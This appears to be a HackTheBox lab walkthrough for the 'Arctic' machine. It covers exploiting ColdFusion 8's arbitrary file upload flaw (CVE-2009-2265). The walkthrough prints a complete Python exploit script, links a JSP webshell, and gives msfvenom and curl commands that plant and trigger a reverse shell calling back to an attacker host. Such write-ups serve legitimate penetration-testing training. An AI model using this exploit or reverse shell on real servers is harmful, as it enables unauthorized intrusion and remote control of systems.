> For the complete documentation index, see [llms.txt](https://akshaydeepakshinde.gitbook.io/hackthebox-windows/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://akshaydeepakshinde.gitbook.io/hackthebox-windows/hackthebox-arctic.md).

# HackTheBox - Arctic

![](/files/-MZ8Kr9EWOF1eV6NdciE)

### Nmap scan results

![](/files/-MZ8KxOoTlrMbcLSiNRS)

{% hint style="info" %}
From Wikipedia, the free encyclopedia. **Microsoft RPC** (**Microsoft** Remote Procedure Call) is a modified version of DCE/**RPC**. Additions include partial support for UCS-2 (but not Unicode) strings, implicit handles, and complex calculations in the variable-length string and structure paradigms already present in DCE/**RPC**.
{% endhint %}

> &#x20;**Remote Procedure Call** (**RPC**) is a protocol that one program can use to request a service from a program located in another computer on a network without having to understand the network's details. **RPC** is **used to** call other processes on the remote systems like a local system.

### Identifying ColdFusion running on port 8500

![](/files/-MZ8MDM3LRNi0H5mZ1Me)

The webserver is running ColdFusion 8 and we can check for known vulnerabilities using **searchsploit**.

![](/files/-MZ8MsZCH84HwL6Xvegl)

### Exploiting ColdFusion's Arbitrary File Upload

We can try `Arbitrary File Upload module`, as we are not interested in exploiting Cross Site Scripting.

References: <https://onecompiler.com/python/3vurkz7hh>

```python
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        path = sys.argv[3]
        with open(sys.argv[4], 'r') as payload:
            body=payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'r') as payload:
            body=payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'

try:
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/cmd.jsp%00",
files={'newfile': ('exploit2.txt', body, 'application/x-java-archive')}, timeout=90)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/cmd.jsp'
    else:
        print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'

```

Let's upload a cmd.jsp file. You can get the `cmd.jsp` file from [here](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmd.jsp).

![](/files/-MZ8SMMfZFEuR86HeWu2)

The webserver is taking a lot of time to process a single request. So it might take some time for uploading the payload.

After the webshell gets uploaded, we can try a simple command to test it out.

![](/files/-MZ8SgYmQ61yPhiSvHod)

### Generating JSP Reverse Shell using MSFVenom

Now I will upload a reverse shell instead of running commands on the webshell, as it takes a hell lot of time.

```python
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw > shell.jsp
python exploit.py 10.10.10.11 8500 shell.jsp
curl http://10.10.10.11:8500/userfiles/file/reverse.jsp
```

![](/files/-MZ8Upi90gDc7VuJsytw)
